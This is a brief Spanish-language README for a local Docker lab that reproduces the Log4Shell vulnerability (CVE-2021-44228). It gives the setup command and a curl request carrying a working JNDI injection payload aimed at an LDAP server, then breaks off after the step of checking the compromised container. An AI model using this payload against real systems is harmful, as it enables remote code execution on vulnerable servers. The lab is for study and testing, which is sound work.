
CVE-2021-44228
Este repositorio es una configuración de una sola línea para el laboratorio de explotación log4shell.
Configura el laboratorio: docker-compose up -d
Ejecuta el exploit: curl -X GET http://localhost:8080/ -H "X-Api-Version: ${jndi:ldap://my_ldap_server:1389/a}"
Luego ve al contenedor vul y comprueba que efectivamente hemos comprometido la máquina:
